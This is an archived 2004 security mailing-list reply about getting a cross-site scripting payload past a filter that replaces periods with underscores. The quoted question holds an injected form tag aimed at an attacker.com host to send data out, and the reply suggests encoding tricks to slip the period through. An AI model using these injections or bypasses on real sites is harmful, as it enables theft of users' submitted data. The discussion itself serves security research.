mailing list archives
Re: Fullstop Substitution in XSS
From: Jonathan Stade <jstade () mtroyal ca>
Date: Tue, 01 Jun 2004 13:38:46 -0600
On Tue, 2004-06-01 at 00:03, windo () windowlicker dyn ee wrote:
My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script"> is of course being filtered
into: <form target="http://attacker_com/path/to/script">
Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering, obviously).
Of course i dont know how the substitution works, but double encoding like
this MIGHT work:
print.php does what you described in a very basic manner, prints the
input substituting any '.' with '_'.
Along similar lines, another thing to try might be to use the HTML
entity . which is a period/fullstop, and also try using the entity,
but unicode encode it. Not sure if that will work, it was just something
that popped into my head.